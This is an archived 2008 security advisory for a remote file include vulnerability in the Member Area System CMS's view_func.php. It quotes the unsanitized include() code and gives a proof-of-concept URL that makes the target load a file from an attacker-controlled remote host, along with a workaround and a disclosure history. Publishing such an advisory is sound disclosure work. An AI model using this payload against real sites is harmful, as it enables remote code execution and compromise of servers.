AOH :: HP Unsorted M :: BX1389.HTM

Member Area System (MAS) Remote File Include Vulnerability (view_func.php)



Member Area System (MAS) Remote File Include Vulnerability (view_func.php)
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)



----------------------------------------------------------------------=0D
=0D
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)=0D
=0D
----------------------------------------------------------------------=0D
=0D
Author: ShipNX =0D
Impact: Remote file include=0D
Status: Patch not available=0D
=0D
----------------------------------------------------------------------=0D
=0D
Software description:=0D
=0D
Name: Member Area System (MAS)=0D
Version: Vendor does not disclose version information since v1.7.=0D
Probably later versions are also vulnerable=0D
Vendor: Mansion Productions=0D
Vendor homepage: http://www.mansionproductions.com/=0D 
Software homepage: http://www.mansionproductions.com/mas/=0D 
=0D
Description:=0D
MAS is a leading content management system (CMS) specially designed =0D
for adult-oriented sites managements. It is used on many major adult=0D
sites around the world.=0D
=0D
----------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
=0D
Code: view_func.php=0D
=0D
...=0D
$path=dirname($i).'/';=0D
include($path.$l.'/'.'filelist.mas');=0D
...=0D
=0D
The variables $i and $l are not properly sanitized=0D
before using them in include() construction. =0D
If Register Globals = On and Allow URL Include (Allow URL Fopen) = On=0D
then an attacker can send the malicious request leading to remote=0D
file include and therefore arbitrary command execution.=0D
=0D
---------------------------------------------------------------------=0D
=0D
POC:=0D
=0D
Conditions:=0D
Register Globals = On=0D
Allow URL fopen (Allow URL include since PHP 5.2.0) = On=0D
=0D
http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?=0D 
=0D
Note: =0D
=0D
justsomedir/ is required here as data passed via $i first gets sent to dirname() function=0D
which will product=0D
=0D
$path='http://remotesite.com/';=0D 
=0D
The remote file should be placed at http://remotesite.com/testfile.txt=0D 
=0D
----------------------------------------------------------------------=0D
=0D
Workaround:=0D
=0D
The vendor is aware of the vuln for ages (probably since 2006) so they=0D
recommend setting up Register Globals = Off. Not sure why they haven't=0D
patched the vuln already. If Register Globals is Off on your server, then=0D
you are more or less secure. If it is On, ask your system administrator=0D
to turn it Off. If for some reason you need Register Globals = On on your=0D
site (using old software etc), then contact the vendor and MAYBE they will=0D
finally patch the bug :-)=0D
=0D
----------------------------------------------------------------------=0D
=0D
History:=0D
=0D
Vuln found: Late 2005 :-))=0D
Vendor notified: Seems like the vendor knows of the vuln since 2006, but=0D
for some reason fails to patch the vuln. Maybe they just want it to keep=0D
quiet, or maybe the security matters just don't bother them - not sure. =0D
Anyway, maybe this advisory will finally force them to do patching :-))=0D
Advisory: 11/01/2008=0D
=0D
----------------------------------------------------------------------=0D
=0D
Thanks to:=0D
=0D
DeZender creators :-)

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.